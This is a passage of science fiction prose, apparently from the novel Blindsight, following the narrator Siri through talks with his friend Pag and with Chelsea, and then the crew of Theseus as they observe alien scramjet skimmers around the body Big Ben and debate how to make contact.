+Showing them had become a cornerstone of Robert Paglino's life. He'd really made it work for him, too, overcome the handicap of a natural birth with retrofits and enhancements and sheer bloody-mindedness. In a world in which Humanity had become redundant in unprecedented numbers, we'd both retained the status of another age: working professional.
+"So you're taking orders from a vamp," he said now. "Talk about fighting fire with fire."
+"I guess it's practice. Until we run up against the real thing."
+He laughed. I couldn't imagine why. But I smiled back anyway.
+It was good to see him.
+"So, what are they like?" Pag asked.
+"Vampires? I don't know. Just met my first one yesterday."
+"And?"
+"Hard to read. Didn't even seem to be aware of his surroundings sometimes, he seemed to be... off in his own little world."
+"He's aware all right. Those things are so fast it's scary. You know they can hold both aspects of a Necker cube in their heads at the same time?"
+The term rang a bell. I subtitled, and saw the thumbnail of a familiar wireframe box:
+
+
+
+Now I remembered: classic ambiguous illusion. Sometimes the shaded panel seemed to be in front, sometimes behind. The perspective flipped back and forth as you watched.
+"You or I, we can only see it one way or the other," Pag was saying. "Vamps see it both ways at once. Do you have any idea what kind of an edge that gives 'em?"
+"Not enough of one."
+"Touché. But hey, not their fault neutral traits get fixed in small populations."
+"I don't know if I'd call the Crucifix glitch neutral."
+"It was at first. How many intersecting right angles do you see in nature?" He waved one dismissive hand. "Anyway, that's not the point. The point is they can do something that's neurologically impossible for us Humans. They can hold simultaneous multiple worldviews, Pod-man. They just see things we have to work out step-by-step, they don't have to think about it. You know, there isn't a single baseline human who could just tell you, just off the top of their heads, every prime number between one and a billion? In the old days, only a few autistics could do shit like that."
+"He never uses the past tense," I murmered.
+"Huh? Oh, that." Pag nodded. "They never experience the past tense. It's just another thread to them. They don't remember stuff, they relive it."
+"What, like a post-traumatic flashback?"
+"Not so traumatic." He grimaced. "Not for them, at least."
+"So this is obviously your current hot spot? Vampires?"
+"Pod, vampires are the capital-Hot spot for anyone with a 'neuro' in their c.v. I'm just doing a couple of histology papers. Pattern-matching receptors, Mexican-hat arrays, reward/irrelevance filters. The eyes, basically."
+"Right." I hesitated. "Those kind of throw you."
+"No shit." Pag nodded knowingly. "That tap lucidum of theirs, that shine. Scary." He shook his head, impressed all over again at the recollection.
+"You've never met one," I surmised.
+"What, in the flesh? I'd give my left ball. Why?"
+"It's not the shine. It's the—" I groped for a word that fit— "The attitude, maybe."
+"Yeah," he said after a bit. "I guess sometimes you've just gotta be there, huh? Which is why I envy you, Pod-man."
+"You shouldn't."
+"I should. Even if you never meet whoever sent the 'Flies, you're in for one Christly research opportunity with that—Sarasti, is it?"
+"Wasted on me. The only neuro in my file's under medical history."
+He laughed. "Anyway, like I said, I just saw your name in the headlines and I figured, hey, the man's leaving in a couple of months, I should probably stop waiting around for him to call."
+It had been over two years. "I didn't think I'd get through. I thought you'd shitlisted me."
+"Nah. Never." He looked down, though, and fell silent.
+"But you should have called her," he said at last.
+"I know."
+"She was dying. You should've—"
+"There wasn't time."
+He let the lie sit there for a while.
+"Anyway," he said at last. "I just wanted to wish you luck." Which wasn't exactly true either.
+"Thanks. I appreciate that."
+"Kick their alien asses. If aliens have asses."
+"There's five of us, Pag. Nine if you count the backups. We're not exactly an army."
+"Just an expression, fellow mammal. Bury the hatchet. Damn the torpedoes. Soothe the serpent."
+Raise the white flag, I thought.
+"I guess you're busy," he said, "I'll—"
+"Look, you want to get together? In airspace? I haven't been to QuBit's in a while."
+"Love to, Pod. Unfortunately I'm in Mankoya. Splice'n'dice workshop."
+"What, you mean physically?"
+"Cutting-edge research. Old-school habits."
+"Too bad."
+"Anyway, I'll let you go. Just wanted, you know—"
+"Thanks," I said again.
+"So, you know. Bye," Robert Paglino told me. Which was, when you got down to it, the reason he'd called.
+He wasn't expecting another chance.
+
+*
+
+Pag blamed me for the way it had ended with Chelsea. Fair enough. I blamed him for the way it began.
+He'd gone into neuroeconomics at least partly because his childhood buddy had turned into a pod person before his eyes. I'd ended up in Synthesis for roughly the same reason. Our paths had diverged, and we didn't see each other in the flesh all that often; but two decades after I'd brutalized a handful of children on his behalf, Robert Paglino was still my best and only friend.
+"You need to seriously thaw out," he told me, "And I know just the lady to handle the oven mitts."
+"That is perhaps the worst use of metaphor in the history of human language," I said.
+"Seriously, Pod. She'll be good for you. A, a counterbalance—ease you a bit closer to the comfy mean, you know?"
+"No, Pag, I don't. What is she, another neuroeconomist?"
+"Neuroaestheticist," he said.
+"There's still a market for those?" I couldn't imagine how; why pay to tweak your compatibility with some significant other, when significant others themselves were so out of fashion?
+"Not much of one," Pag admitted. "Fact is, she's pretty much retired. But she's still got the tools, my man. Very thigmotactic. Likes all her relationships face-to-face and in the flesh."
+"I dunno, Pag. Sounds like work."
+"Not like your work. She's got to be easier than the bleeding composites you front for. She's smart, she's sexy, and she's nicely inside the standard deev except for the personal contact thing. Which is not so much outright perversion as charming fetish. In your case it could even be therapeutic."
+"If I wanted therapy I'd see a therapist."
+"She does a bit of that too, actually."
+"Yeah?" And then, despite myself, "Any good?"
+He looked me up and down. "No one's that good. That's not what this is. I just figured you two would click. Chelse is one of the few who might not be completely put off by your intimacy issues."
+"Everyone's got intimacy issues these days, in case you hadn't noticed." He must have; the population had been dropping for decades.
+"I was being euphemistic. I meant your aversion to general Human contact."
+"Making it euphemistic to call you Human?"
+He grinned. "Different deal. We got history."
+"No thanks."
+"Too late. She's already en route to the appointed place."
+"Appoin—you're an asshole, Pag."
+"The tightest."
+Which was how I found myself intrusively face-to-face in an airspace lounge south of Beth and Bear. The lighting was low and indirect, creeping from under seats and the edges of tables; the chromatics, this afternoon at least, were defiantly longwave. It was a place where baselines could pretend to see in infrared.
+So I pretended for a moment, assessing the woman in the corner booth: gangly and glorious, half-a-dozen ethnicities coexisting peacefully with no single voice dominant. Something glowed on her cheek, a faint emerald staccato against the ambient red shift. Her hair floated in a diffuse ebony cloud about her head; as I neared I caught occasional glints of metal within that nimbus, the threads of a static generator purveying the illusion of weightlessness. In normal light her blood-red skin would doubtless shift down to the fashionable butterscotch of the unrepentant mongrel.
+She was attractive, but so was everyone in this kind of light; the longer the wavelength, the softer the focus. There's a reason fuckcubbies don't come with fluorescent lights.
+You will not fall for this, I told myself.
+"Chelsea," she said. Her little finger rested on one of the table's inset trickle-chargers. "Former neuroaestheticist, presently a parasite on the Body Economic thanks to genes and machines on the cutting edge."
+The glow on her cheek flapped bright lazy wings: a tattoo, a bioluminescent butterfly.
+"Siri," I said. "Freelance synthesist, indentured servant to the genes and machines that turned you into a parasite."
+She waved at the empty seat. I took it, assessing the system before me, sizing up the best approach for a fast yet diplomatic disconnect. The set of her shoulders told me she enjoyed lightscapes, and was embarrassed to admit it. Monahan was her favorite artist. She thought herself a natural girl because she'd stayed on chemical libidinals all these years, even though a synaptic edit would have been simpler. She revelled in her own inconsistency: a woman whose professional machinery edited thought itself, yet mistrustful of the dehumanising impact of telephones. Innately affectionate, and innately afraid of unreturned affection, and indomitably unwilling to let any of that stop her.
+She liked what she saw when looked at me. She was a little afraid of that, too.
+Chelsea gestured at my side of the table. The touchpads there glowed soft, dissonant sapphire in the bloody light, like a set of splayed fingerprints. "Good dope here. Extra hydroxyl on the ring, or something."
+Assembly-line neuropharm doesn't do much for me; it's optimized for people with more meat in their heads. I fingered one of the pads for appearances, and barely felt the tingle.
+"So. A Synthesist. Explaining the Incomprehensible to the Indifferent."
+I smiled on cue. "More like bridging the gap between the people who make the breakthroughs and the people who take the credit for them."
+She smiled back. "So how do you do it? All those optimized frontal lobes and refits—I mean, if they're incomprehensible, how do you comprehend them?"
+"It helps to find pretty much everyone else incomprehensible too. Provides experience." There. That should force a bit of distance.
+It didn't. She thought I was joking. I could see her lining up to push for more details, to ask questions about what I did, which would lead to questions about me, which would lead—
+"Tell me what it's like," I said smoothly, "rewiring people's heads for a living."
+Chelsea grimaced; the butterfly on her cheek fluttered nervously at the motion, wings brightening. "God, you make it sound like we turn them into zombies or something. They're just tweaks, mainly. Changing taste in music or cuisine, you know, optimizing mate compatibility. It's all completely reversible."
+"There aren't drugs for that?"
+"Nah. Too much developmental variation between brains; our targeting is really fine-scale. But it's not all microsurgery and fried synapses, you know. You'd be surprised how much rewiring can be done noninvasively. You can start all sorts of cascades just by playing certain sounds in the right order, or showing images with the right balance of geometry and emotion."
+"I assume those are new techniques."
+"Not really. Rhythm and music hang their hats on the same basic principle. We just turned art into science."
+"Yeah, but when?" The recent past, certainly. Sometime within the past twenty years or so—
+Her voice grew suddenly quiet. "Robert told me about your operation. Some kind of viral epilepsy, right? Back when you were just a tyke."
+I'd never explicitly asked him to keep it a secret. What was the difference anyway? I'd made a full recovery.
+Besides, Pag still thought that had happened to someone else.
+"I don't know your specifics," Chelsea continued gently. "But from the sound of it, noninvasive techniques wouldn't have helped. I'm sure they only did what they had to."
+I tried to suppress the thought, and couldn't: I like this woman.
+I felt something then, a strange, unfamiliar sensation that somehow loosened my vertebrae. The chair felt subtly, indefinably more comfortable at my back.
+"Anyway." My silence had thrown her off-stride. "Haven't done it much since the bottom dropped out of the market. But it did leave me with a fondness for face-to-face encounters, if you know what I mean."
+"Yeah. Pag said you took your sex in the first-person."
+She nodded. "I'm very old-school. You okay with that?"
+I wasn't certain. I was a virgin in the real world, one of the few things I still had in common with the rest of civilized society. "In principle, I guess. It just seems—a lot of effort for not as much payoff, you know?"
+"Don't I." She smiled. "Real fuckbuddies aren't airbrushed. Got all these needs and demands that you can't edit out. How can you blame anyone for saying no thanks to all that, now there's a choice? You gotta wonder how our parents ever stayed together sometimes."
+You gotta wonder why they did. I felt myself sinking deeper into the chair, wondered again at this strange new sensation. Chelsea had said the dopamine was tweaked. That was probably it.
+She leaned forward, not coy, not coquettish, not breaking eye contact for an instant in the longwave gloom. I could smell the lemony tang of pheromones and synthetics mingling on her skin. "But there are advantages too, once you learn the moves," she said. "The body's got a long memory. And you do realize that there's no trickler under your left finger there, don't you, Siri?"
+I looked. My left arm was slightly extended, index finger touching one of the trickle pads; and my right had mirrored the motion while I wasn't watching, its own finger tapping uselessly on blank tabletop.
+I pulled it back. "Bit of a bilateral twitch," I admitted. "The body creeps into symmetrical poses when I'm not looking."
+I waited for a joke, or at least a raised eyebrow. Chelsea just nodded and resumed her thread. "So if you're game for this, so am I. I've never been entangled with a synthesist before."
+"Jargonaut's fine. I'm not proud."
+"Don't you just always know just exactly what to say." She cocked her head at me. "So, your name. What's it mean?"
+Relaxed. That was it. I felt relaxed.
+"I don't know. It's just a name."
+"Well, it's not good enough. If we're gonna to be swapping spit for any length of time you've gotta get a name that means something."
+And we were, I realized. Chelsea had decided while I wasn't looking. I could have stopped her right there, told her what a bad idea this was, apologized for any misunderstanding. But then there'd be wounded looks and hurt feelings and guilt because after all, if I wasn't interested why the hell had I even shown up?
+She seemed nice. I didn't want to hurt her.
+Just for a while, I told myself. It'll be an experience.
+"I think I'll call you Cygnus," Chelsea said.
+"The swan?" I said. A bit precious, but it could have been worse.
+She shook her head. "Black hole. Cygnus X-1."
+I furrowed my brow at her, but I knew exactly what she meant: a dark, dense object that sucks up the light and destroys everything in its path.
+"Thanks a whole fucking lot. Why?"
+"I'm not sure. Something dark about you." She shrugged, and gave me a great toothy grin. "But it's not unattractive. And let me give you a tweak or two, I bet you'd grow right out of it."
+Pag admitted afterward, a bit sheepishly, that maybe I should have read that as a warning sign. Live and learn.
+
+"Leaders are visionaries with a poorly developed sense of fear
+and no concept of the odds against them."
+—Robert Jarvik
+
+Our scout fell towards orbit, watching Ben. We fell days behind, watching the scout. And that was all we did: sit in Theseus' belly while the system streamed telemetry to our inlays. Essential, irreplaceable, mission-critical—we might as well have been ballast during that first approach.
+We passed Ben's Rayleigh limit. Theseus squinted at a meager emission spectrum and saw a rogue halo element from Canis Major—a dismembered remnant of some long-lost galaxy that had drifted into ours and ended up as road kill, uncounted billions of years ago. We were closing on something from outside the Milky Way.
+The probe arced down and in, drew close enough for false-color enhance. Ben's surface brightened to a seething parfait of high-contrast bands against a diamond-hard starscape. Something twinkled there, faint sparkles on endless overcast.
+"Lightning?" James wondered.
+Szpindel shook his head. "Meteorites. Must be a lot of rock in the neighborhood."
+"Wrong color," Sarasti said. He was not physically among us—he was back in his tent, hardlined into the Captain—but ConSensus put him anywhere on board he wanted to be.
+Morphometrics scrolled across my inlays: mass, diameter, mean density. Ben's day lasted seven hours twelve minutes. Diffuse but massive accretion belt circling the equator, more torus than ring, extending almost a half-million kilometers from the cloud-tops: the pulverized corpses of moons perhaps, ground down to leftovers.
+"Meteorites." Szpindel grinned. "Told ya."
+He seemed to be right; increasing proximity smeared many of those pinpoint sparkles into bright ephemeral hyphens, scratching the atmosphere. Closer to the poles, cloud bands flickered with dim, intermittent flashes of electricity.
+Weak radio emission peaks at 31 and 400m. Outer atmosphere heavy with methane and ammonia; lithium, water, carbon monoxide in abundance. Ammonia hydrogen sulfide, alkali halide mixing locally in those torn swirling clouds. Neutral alkalis in the upper layers. By now even Theseus could pick those things out from a distance, but our scout was close enough to see filigree. It no longer saw a disk. It gazed down at a dark convex wall in seething layers of red and brown, saw faint stains of anthracene and pyrene.
+One of a myriad meteorite contrails scorched Ben's face directly ahead; for a moment I thought I could even see the tiny dark speck at its core, but sudden static scratched the feed. Bates cursed softly. The image blurred, then steadied as the probe pitched its voice higher up the spectrum. Unable to make itself heard above the longwave din, now it spoke down a laser.
+And still it stuttered. Keeping it aligned across a million fluctuating kilometers should have posed no problem at all; our respective trajectories were known parabolas, our relative positions infinitely predictable at any time t. But the meteorite's contrail jumped and skittered on the feed, as if the beam were being repeatedly, infinitesimally knocked out of alignment. Incandescent gas blurred its details; I doubted that even a rock-steady image would have offered any sharp edges for a human eye to hold on to. Still. There was something wrong about it somehow, something about the tiny black dot at the core of that fading brightness. Something that some primitive part of my mind refused to accept as natural—
+The image lurched again, and flashed to black, and didn't return.
+"Probe's fried," Bates reported. "Spike there at the end. Like it hit a Parker Spiral, but with a really tight wind."
+I didn't need to call up subtitles. It was obvious in the set of her face, the sudden creases between her eyebrows: she was talking about a magnetic field.
+"It's—" she began, and stopped as a number popped up in ConSensus: 11.2 Tesla.
+"Holy shit," Szpindel whispered. "Is that right?"
+Sarasti clicked from the back of his throat and the back of the ship. A moment later he served up an instant replay, those last few seconds of telemetry zoomed and smoothed and contrast-enhanced from visible light down to deep infrared. There was that same dark shard cauled in flame, there was the contrail burning in its wake. Now it dimmed as the object skipped off the denser atmosphere beneath and regained altitude. Within moments the heat trace had faded entirely. The thing that had burned at its center rose back into space, a fading ember. A great conic scoop at its front end gaped like a mouth. Stubby fins disfigured an ovoid abdomen.
+Ben lurched and went out all over again.
+"Meteorites," Bates said dryly.
+The thing had left me with no sense of scale. It could have been an insect or an asteroid. "How big?" I whispered, a split-second before the answer appeared on my inlays:
+Four hundred meters along the major axis.
+Ben was safely distant in our sights once more, a dark dim disk centered in Theseus's forward viewfinder. But I remembered the close-up: a twinkling orb of black-hearted fires; a face gashed and pockmarked, endlessly wounded, endlessly healing.
+There'd been thousands of the things.
+Theseus shivered along her length. It was just a pulse of decelerating thrust; but for that one moment, I imagined I knew how she felt.
+
+*
+
+We headed in and hedged our bets.
+Theseus weaned herself with a ninety-eight-second burn, edged us into some vast arc that might, with a little effort, turn into an orbit—or into a quick discreet flyby if the neighborhood turned out to be a little too rough. The Icarus stream fell invisibly to port, its unswerving energy lost to space-time. Our city-sized, molecule-thick parasol wound down and packed itself away until the next time the ship got thirsty. Antimatter stockpiles began dropping immediately; this time we were alive to watch it happen. The dip was infinitesimal, but there was something disquieting about the sudden appearance of that minus sign on the display.
+We could have retained the apron strings, left a buoy behind in the telematter stream to bounce energy down the well after us. Susan James wondered why we hadn't.
+"Too risky," Sarasti said, without elaboration.
+Szpindel leaned in James' direction. "Why give 'em something else to shoot at, eh?"
+We sent more probes ahead, though, spat them out hard and fast and too fuel-constrained for anything but flyby and self-destruct. They couldn't take their eyes off the machines swinging around Big Ben. Theseus stared her own unblinking stare, more distant though more acute. But if those high divers even knew we were out there, they ignored us completely. We tracked them across the closing distance, watched them swoop and loop though a million parabolas at a million angles. We never saw them collide—not with each other, not with the cauldron of rock tumbling around Ben's equator. Every perigee dipped briefly into atmosphere; there they burned, and slowed, and accelerated back into space, their anterior scoops glowing with residual heat.
+Bates grabbed a ConSensus image, drew highlights and a conclusion around the front end: "Scramjet."
+We tracked nearly four hundred thousand in less than two days. That appeared to be most of them; new sightings leveled off afterwards, the cumulative curve flattening towards some theoretical asymptote. Most of the orbits were close and fast, but Sarasti projected a frequency distribution extending almost back to Pluto. We might stay out here for years, and still catch the occasional new shovelnose returning from its extended foray into the void.
+"The faster ones are pulling over fifty gees on the hairpin turn," Szpindel pointed out. "Meat couldn't handle that. I say they're unmanned."
+"Meat's reinforceable," Sarasti said.
+"If it's got that much scaffolding you might as well stop splitting hairs and call it a machine anyway."
+Surface morphometrics were absolutely uniform. Four hundred thousand divers, every one identical. If there was an alpha male calling the shots among the herd, it couldn't be distinguished on sight.
+One night—as such things were measured on board— I followed a soft squeal of tortured electronics up to the observation blister. Szpindel floated there, watching the skimmers. He'd closed the clamshells, blocked off the stars and built a little analytical nest in their place. Graphs and windows spilled across the inside of the dome as though the virtual space in Szpindel's head was insufficient to contain them. Tactical graphics lit him from all sides, turned his body into a bright patchwork of flickering tattoos.
+The Illustrated Man. "Mind if I come in?" I asked.
+He grunted: Yeah, but not enough to push it.
+Inside the dome, the sound of heavy rainfall hissed and spat behind the screeching that had led me here. "What is that?"
+"Ben's magnetosphere." He didn't look back. "Nice, eh?"
+Synthesists don't have opinions on the job; it keeps observer effects to a minimum. This time I permitted myself a small breach. "The static's nice. I could do without the screeching."
+"Are you kidding? That's the music of the spheres, commissar. It's beautiful. Like old jazz."
+"I never got the hang of that either."
+He shrugged and squelched the upper register, left the rain pattering around us. His jiggling eyes fixed on some arcane graphic. "Want a scoop for your notes?"
+"Sure."
+"There you go." Light reflected off his feedback glove, iridescing like the wing of a dragonfly as he pointed: an absorption spectrum, a looped time-series. Bright peaks surged and subsided, surged and subsided across a fifteen-second timeframe.
+Subtitles only gave me wavelengths and Angstroms. "What is it?"
+"Diver farts. Those bastards are dumping complex organics into the atmosphere."
+"How complex?"
+"Hard to tell, so far. Faint traces, and they dissipate like that. But sugars and aminos at least. Maybe proteins. Maybe more."
+"Maybe life? Microbes?" An alien terraforming project...
+"Depends on how you define life, eh?" Szpindel said. "Not even Deinococcus would last long down there. But it's a big atmosphere. They better not be in any hurry if they're reworking the whole thing by direct inoculation."
+If they were, the job would go a lot faster with self-replicating inoculates. "Sounds like life to me."
+"Sounds like agricultural aerosols, is what it sounds like. Those fuckers are turning the whole damn gas ball into a rice paddy bigger than Jupiter." He gave me a scary grin. "Something's got a beeeg appetite, hmm? You gotta wonder if we aren't gonna be a teeny bit outnumbered."
+
+*
+
+Szpindel's findings were front and center at our next get-together.
+The vampire summed it up for us, visual aids dancing on the table: "Von Neumann self-replicating r-selector. Seed washes up and sprouts skimmers, skimmers harvest raw materials from the accretion belt. Some perturbations in those orbits; belt's still unsettled."
+"Haven't seen any of the herd giving birth," Szpindel remarked. "Any sign of a factory?"
+Sarasti shook his head. "Discarded, maybe. Decompiled. Or the herd stops breeding at optimal N."
+"These are only the bulldozers," Bates pointed out. "There'll be tenants."
+"A lot of 'em, eh?" Szpindel added. "Outnumber us by orders of mag."
+James: "But they might not show up for centuries."
+Sarasti clicked. "Do these skimmers build Fireflies? Burns-Caulfield?"
+It was a rhetorical question. Szpindel answered anyway: "Don't see how."
+"Something else does, then. Something already local."
+Nobody spoke for a moment. James' topology shifted and shuffled in the silence; when she opened her mouth again, someone indefinably younger was on top.
+"Their habitat isn't anything like ours, if they're building a home way out here. That's hopeful."
+Michelle. The synesthete.
+"Proteins." Sarasti's eyes were unreadable behind the visor. Comparable biochemistries. They might eat us.
+"Whoever these beings are, they don't even live in sunlight. No territorial overlap, no resource overlap, no basis for conflict. There's no reason we shouldn't get along just fine."
+"On the other hand," Szpindel said, "Technology implies belligerence."
+Michelle snorted softly. "According to a coterie of theoretical historians who've never actually met an alien, yes. Maybe now we get to prove them wrong." And in the next instant she was just gone, her affect scattered like leaves in a dust-devil, and Susan James was back in her place saying:
+"Why don't we just ask them?"
+"Ask?" Bates said.
+"There are four hundred thousand machines out there. How do we know they can't talk?"
+"We'd have heard.," Szpindel said. "They're drones."
+"Can't hurt to ping them, just to make sure."
+"There's no reason they should talk even if they are smart. Language and intelligence aren't all that strongly correlated even on Ear—"
+James rolled her eyes. "Why not try, at least? It's what we're here for. It's what I'm here for. Just send a bloody signal."
+After a moment Bates picked up the ball. "Bad game theory, Suze."
+"Game theory." She made it sound like a curse.
+"Tit-for-tat's the best strategy. They pinged us, we pinged back. Ball's in their court now; we send another signal, we may give away too much."
+"I know the rules, Amanda. They say if the other party never takes the initiative again, we ignore each other for the rest of the mission because game theory says you don't want to look needy."
+"The rule only applies when you're going up against an unknown player, " the Major explained. "We'll have more options the more we learn."
+James sighed. "It's just—you all seem to be going into this assuming they'll be hostile. As if a simple hailing signal is going to bring them down on us."
+Bates shrugged. "It only makes sense to be cautious. I may be a jarhead but I'm not eager to piss off anything that hops between stars and terraforms superJovians for a living. I don't have to remind anyone here that Theseus is no warship."
+She'd said anyone; she'd meant Sarasti. And Sarasti, focused on his own horizon, didn't answer. Not out loud, at least; but his surfaces spoke in a different tongue entirely.
+Not yet, they said.
+
+*
+
+Bates was right, by the way. Theseus was officially tricked out for exploration, not combat. No doubt our masters would have preferred to load her up with nukes and particle cannons as well as her scientific payload, but not even a telemattered fuel stream can change the laws of inertia. A weaponized prototype would have taken longer to build; a more massive one, laden with heavy artillery, would take longer to accelerate. Time, our masters had decided, was of greater essence than armament. In a pinch our fabrication facilities could build most anything we needed, given time. It might take a while to build a particle-beam cannon from scratch, and we might have to scavenge a local asteroid for the raw material, but we could do it. Assuming our enemies would be willing to wait, in the interests of fair play.
+But what were the odds that even our best weapons would prove effective against the intelligence that had pulled off the Firefall? If the unknown was hostile, we were probably doomed no matter what we did. The Unknown was technologically advanced—and there were some who claimed that that made them hostile by definition. Technology Implies Belligerence, they said.
+I suppose I should explain that, now that it's completely irrelevant. You've probably forgotten after all this time.
+Once there were three tribes. The Optimists, whose patron saints were Drake and Sagan, believed in a universe crawling with gentle intelligence—spiritual brethren vaster and more enlightened than we, a great galactic siblinghood into whose ranks we would someday ascend. Surely, said the Optimists, space travel implies enlightenment, for it requires the control of great destructive energies. Any race which can't rise above its own brutal instincts will wipe itself out long before it learns to bridge the interstellar gulf.
+Across from the Optimists sat the Pessimists, who genuflected before graven images of Saint Fermi and a host of lesser lightweights. The Pessimists envisioned a lonely universe full of dead rocks and prokaryotic slime. The odds are just too low, they insisted. Too many rogues, too much radiation, too much eccentricity in too many orbits. It is a surpassing miracle that even one Earth exists; to hope for many is to abandon reason and embrace religious mania. After all, the universe is fourteen billion years old: if the galaxy were alive with intelligence, wouldn't it be here by now?
+Equidistant to the other two tribes sat the Historians. They didn't have too many thoughts on the probable prevalence of intelligent, spacefaring extraterrestrials— but if there are any, they said, they're not just going to be smart. They're going to be mean.
+It might seem almost too obvious a conclusion. What is Human history, if not an ongoing succession of greater technologies grinding lesser ones beneath their boots? But the subject wasn't merely Human history, or the unfair advantage that tools gave to any given side; the oppressed snatch up advanced weaponry as readily as the oppressor, given half a chance. No, the real issue was how those tools got there in the first place. The real issue was what tools are for.
+To the Historians, tools existed for only one reason: to force the universe into unnatural shapes. They treated nature as an enemy, they were by definition a rebellion against the way things were. Technology is a stunted thing in benign environments, it never thrived in any culture gripped by belief in natural harmony. Why invent fusion reactors if your climate is comfortable, if your food is abundant? Why build fortresses if you have no enemies? Why force change upon a world which poses no threat?
+Human civilization had a lot of branches, not so long ago. Even into the twenty-first century, a few isolated tribes had barely developed stone tools. Some settled down with agriculture. Others weren't content until they had ended nature itself, still others until they'd built cities in space.
+We all rested eventually, though. Each new technology trampled lesser ones, climbed to some complacent asymptote, and stopped—until my own mother packed herself away like a larva in honeycomb, softened by machinery, robbed of incentive by her own contentment.
+But history never said that everyone had to stop where we did. It only suggested that those who had stopped no longer struggled for existence. There could be other, more hellish worlds where the best Human technology would crumble, where the environment was still the enemy, where the only survivors were those who fought back with sharper tools and stronger empires. The threats contained in those environments would not be simple ones. Harsh weather and natural disasters either kill you or they don't, and once conquered—or adapted to— they lose their relevance. No, the only environmental factors that continued to matter were those that fought back, that countered new strategies with newer ones, that forced their enemies to scale ever-greater heights just to stay alive. Ultimately, the only enemy that mattered was an intelligent one.
+And if the best toys do end up in the hands of those who've never forgotten that life itself is an act of war against intelligent opponents, what does that say about a race whose machines travel between the stars?
+The argument was straightforward enough. It might even have been enough to carry the Historians to victory—if such debates were ever settled on the basic of logic, and if a bored population hadn't already awarded the game to Fermi on points. But the Historian paradigm was just too ugly, too Darwinian, for most people, and besides, no one really cared any more. Not even the Cassidy Survey's late-breaking discoveries changed much. So what if some dirtball at Ursae Majoris Eridani had an oxygen atmosphere? It was forty-three lightyears away, and it wasn't talking; and if you wanted flying chandeliers and alien messiahs, you could build them to order in Heaven. If you wanted testosterone and target practice you could choose an afterlife chock-full of nasty alien monsters with really bad aim. If the mere thought of an alien intelligence threatened your worldview, you could explore a virtual galaxy of empty real estate, ripe and waiting for any God-fearing earthly pilgrims who chanced by.
+It was all there, just the other side of a fifteen-minute splice job and a cervical socket. Why endure the cramped and smelly confines of real-life space travel to go visit pond scum on Europa?
+And so, inevitably, a fourth Tribe arose, a Heavenly host that triumphed over all: the Tribe that Just Didn't Give A Shit. They didn't know what to do when the Fireflies showed up.
+So they sent us, and—in belated honor of the Historian mantra—they sent along a warrior, just in case. It was doubtful in the extreme that any child of Earth would be a match for a race with interstellar technology, should they prove unfriendly. Still, I could tell that Bates' presence was a comfort, to the Human members of the crew at least. If you have to go up unarmed against an angry T-rex with a four-digit IQ, it can't hurt to have a trained combat specialist at your side.
+At the very least, she might be able to fashion a pointy stick from the branch of some convenient tree.
+
+*
+
+"I swear, if the aliens end up eating the lot of us, we'll have the Church of Game Theory to thank for it," Sascha said.
+She was grabbing a brick of couscous from the galley. I was there for the caffeine. We were more or less alone; the rest of the crew was strewn from dome to Fab.
+"Linguists don't use it?" I knew some that did.
+"We don't." And the others are hacks. "Thing about game theory is, it assumes rational self-interest among the players. And people just aren't rational."
+"It used to assume that," I allowed. "These days they factor in the social neurology."
+"Human social neurology." She bit a corner off her brick, spoke around a mouthful of semolina. "That's what game theory's good for. Rational players, or human ones. And let me take a wild stab here and wonder if either of those is gonna apply to that." She waved her hand at some archetypal alien lurking past the bulkhead.
+"It's got its limitations," I admitted. "I guess you use the tools you can lay your hands on."
+Sascha snorted. "So if you couldn't get your hands on a proper set of blueprints, you'd base your dream home on a book of dirty limericks."
+"Maybe not." And then, a bit defensive in spite of myself, I added, "I've found it useful, though. In areas you might not expect it to be."
+"Yeah? Name one."
+"Birthdays," I said, and immediately wished I hadn't.
+Sascha stopped chewing. Something behind her eyes flickered, almost strobed, as if her other selves were pricking up their ears.
+"Go on," she said, and I could feel the whole Gang listening in.
+"It's nothing, really. Just an example."
+"So. Tell us." Sascha cocked James' head at me.
+I shrugged. No point making a big thing out of it. "Well, according to game theory, you should never tell anyone when your birthday is."
+"I don't follow."
+"It's a lose-lose proposition. There's no winning strategy."
+"What do you mean, strategy? It's a birthday."
+Chelsea had said exactly the same thing when I'd tried to explain it to her. Look, I'd said, say you tell everyone when it is and nothing happens. It's kind of a slap in the face.
+Or suppose they throw you a party, Chelsea had replied.
+Then you don't know whether they're doing it sincerely, or if your earlier interaction just guilted them into observing an occasion they'd rather have ignored. But if you don't tell anyone, and nobody commemorates the event, there's no reason to feel badly because after all, nobody knew. And if someone does buy you a drink then you know it's sincere because nobody would go to all the trouble of finding out when your birthday is— and then celebrating it—if they didn't honestly like you.
+Of course, the Gang was more up to speed on such things. I didn't have to explain it verbally: I could just grab a piece of ConSensus and plot out the payoff matrix, Tell/Don't Tell along the columns, Celebrated/Not Celebrated along the rows, the unassailable black-and-white logic of cost and benefit in the squares themselves. The math was irrefutable: the one winning strategy was concealment. Only fools revealed their birthdays.
+Sascha looked at me. "You ever show this to anyone else?"
+"Sure. My girlfriend."
+Her eyebrows lifted. "You had a girlfriend? A real one?"
+I nodded. "Once."
+"I mean after you showed this to her."
+"Well, yes."
+"Uh huh." Her eyes wandered back to the payoff matrix. "Just curious, Siri. How did she react?"
+"She didn't, really. Not at first. Then—well, she laughed."
+"Better woman than me." Sascha shook her head. "I'd have dumped you on the spot."
+
+*
+
+My nightly constitutional up the spine: glorious dreamy flight along a single degree of freedom. I sailed through hatches and corridors, threw my arms wide and spun in the gentle cyclonic breezes of the drum. Bates ran circles around me, bouncing her ball against bins and bulkheads, stretching to field each curving rebound in the torqued pseudograv. The toy ricocheted off a stairwell and out of reach as I passed; the major's curses followed me through the needle's eye from crypt to bridge.
+I braked just short of the dome, stopped by the sound of quiet voices from ahead.
+"Of course they're beautiful," Szpindel murmured. "They're stars."
+"And I'm guessing I'm not your first choice to share the view," James said.
+"You're a close second. But I've got a date with Meesh."
+"She never mentioned it."
+"She doesn't tell you everything. Ask her."
+"Hey, this body's taking its antilibs. Even if yours isn't."
+"Mind out of the gutter, Suze. Eros is only one kind of love, eh? Ancient Greeks recognized four."
+"Riiight." Definitely not Susan, not any more. "Figures you'd take your lead from a bunch of sodomites."
+"Fuck, Sascha. All I'm asking is a few minutes alone with Meesh before the whip starts cracking again..."
+"My body too, Ike. You wanna pull your eyes over my wool?"
+"I just want to talk, eh? Alone. That too much to ask?"
+I heard Sascha take a breath.
+I heard Michelle let it out.
+"Sorry, kid. You know the Gang."
+"Thank God. It's like some group inspection whenever I come looking for face time."
+"I guess you're lucky they like you, then."
+"I still say you ought to stage a coup."
+"You could always move in with us."
+I heard the rustle of bodies in gentle contact. "How are you?" Szpindel asked. "You okay?"
